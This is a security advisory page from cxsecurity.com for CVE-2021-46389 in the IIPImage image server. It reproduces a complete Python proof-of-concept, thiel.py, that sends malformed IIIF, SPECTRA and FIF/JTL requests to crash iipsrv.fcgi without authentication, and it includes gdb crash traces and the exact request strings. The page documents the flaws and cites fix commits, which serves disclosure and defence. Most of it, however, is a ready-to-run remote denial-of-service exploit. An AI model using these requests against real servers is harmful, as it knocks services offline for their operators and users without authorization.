IIPImage Remote Memory Corruption

2022.06.04
Credit: Jeremy Brown
Risk: High
Local: No
Remote: Yes
CWE: CWE-190


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python3 # -*- coding: UTF-8 -*- # # thiel.py # # IIPImage Multiple Remote Memory Corruption Vulnerabilities # # Jeremy Brown [jbrown3264/gmail] # # IIPImage is distributed with a server that enables advanced, high-performance # image manipulation for web-based streaming and viewing of high resolution images. # The server component called iipsrv.fcgi processes requests from users and passes # them to command handlers. Several crashes including an integer overflow were # discovered by sending malformed requests to the server, allowing remote users # without authentication to perform denial-of-service attacks or potentially # crafted for remote code execution as the server's running user. # # Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration # # Demo # # $ ./thiel.py http://10.0.0.201 --trigger iiif # # (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally # ... # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # (gdb) i r # rax 0x7ffef6d50b68 140733039577960 # rbx 0xffffffff 4294967295 # rcx 0xb3 179 # rdx 0x6 6 # rsi 0x5555556ae20d 93824993649165 # rdi 0x7ffef6d50b68 140733039577960 # rbp 0x7fffffffc690 0x7fffffffc690 # rsp 0x7fffffffc4b8 0x7fffffffc4b8 # r8 0x0 0 # r9 0x0 0 # r10 0x55555564f4e0 93824993260768 # r11 0x7ffef6d50b68 140733039577960 # r12 0xb58 2904 # r13 0x81 129 # r14 0x1e4 484 # r15 0x8 8 # rip 0x7ffff7a53708 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152> # # => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>: mov ecx,DWORD PTR [rsi+rdx*1-0x4] # # 0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # 1 0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 # 2 TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470 # 3 0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222 # 4 0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656 # 5 0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741 # # Fixes # - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195 # # CVE-2021-46389 # import os import sys import argparse import signal import requests PATH = '/fcgi-bin/iipsrv.fcgi' # # also there's many params for some functions like fif such as obj, qlt, sds, # cnt, cvt, wid, rgn, etc so the code definitely needs lots of input validation # QUERY_FIF = '?fif=' QUERY_IIIF = '?iiif=' QUERY_SPECTRA = '?spectra=' # # Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. IIIF big region) # # sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff # VALID_FILE = '/var/www/test.tif' ### BUGS ### # # Bug #1: Integer overflow @ TileManager::getRegion() # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # # REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image # REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image error REQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV # REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run) # # Bug #2: NULL ptr deref @ SPECTRA::run # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) at IIPImage.h:335 # 335 unsigned int getTileWidth() { return tile_width; }; # REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary # # Bug #3: Another crash @ JTL::run # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324 # 324 unsigned int getImageWidth( int n=0 ) { return image_widths[n]; }; # REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash # ### END BUGS ### class Thiel(object): def __init__(self, args): self.host = args.host self.trigger = args.trigger def run(self): if(self.trigger == None): print("error: choose which bug use via --trigger") return -1 if(self.trigger == 'iiif'): return self.sendRequest(self.host, REQ_IIIF) if(self.trigger == 'spectra'): return self.sendRequest(self.host, REQ_SPECTRA) if(self.trigger == 'fif_jtl'): return self.sendRequest(self.host, REQ_FIF_JTL) return 0 def sendRequest(self, host, req): session = requests.Session() try: resp = session.get(host + PATH + req) except Exception as error: print("Error: %s" % error) return -1 if(b'502 Bad Gateway' in resp.content): print("done\n") return 0 else: print("[-] iipsrv still appears to be up\n") return -1 def signalExit(): sys.exit(-1) def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("host", type=str, help="target host") parser.add_argument("--trigger", "--trigger", type=str, choices=['iiif', 'spectra', 'fif_jtl'], help="which bug to trigger") args = parser.parse_args() return args def main(): signal.signal(signal.SIGINT, signalExit) args = arg_parse() pt = Thiel(args) result = pt.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top